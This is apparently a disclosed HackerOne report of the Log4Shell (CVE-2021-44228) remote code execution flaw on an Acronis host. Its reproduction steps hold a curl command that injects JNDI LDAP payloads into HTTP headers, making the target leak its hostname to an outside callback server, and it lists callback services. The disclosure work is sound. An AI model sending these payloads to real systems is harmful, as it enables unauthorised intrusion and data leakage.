[CVE-2021-44228] Arbitrary Code Execution on ng01-cloud.acronis.com

Disclosed: 2024-08-28 09:03:58 By mikkocarreon To acronis
Critical
Vulnerability Details
### Description The application is using a vulnerable version of Log4j which allows arbitrary remote command execution. The vulnerability is also known as Log4Shell and is assigned [CVE-2021-44228](https://www.randori.com/blog/cve-2021-44228/). ### Reproduction Steps For easier reproduction, please use Burp Collaborator and issue the following curl command with your collaborator instance URL; ```bash curl --http1.1 --silent --output /dev/null \ --header 'User-agent: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \ --header 'X-Forwarded-For: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \ --header 'Referer: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \ https://ng01-cloud.acronis.com ``` You should receive a request to your Collaborator Client with your server's hostname as the prefix. That should suffice to prove that the host is vulnerable. The hostname I received was `ng01-cloud-elk-ls-vm01`. Note that it may take some time to receive the pingbacks. In case Burp Collaborator doesn't work, I'd advise using your own. Some alternatives are; 1. dig.pm 2. app.interactsh.com 3. dnslog.cn 4. pingb.in 5. requestbin.net 6. canarytokens.com ### Reference https://www.lunasec.io/docs/blog/log4j-zero-day/ ## Impact Arbitrary remote code execution
Actions
View on HackerOne
Report Stats
  • Report ID: 1459714
  • State: Closed
  • Substate: resolved
  • Upvotes: 29
Share this report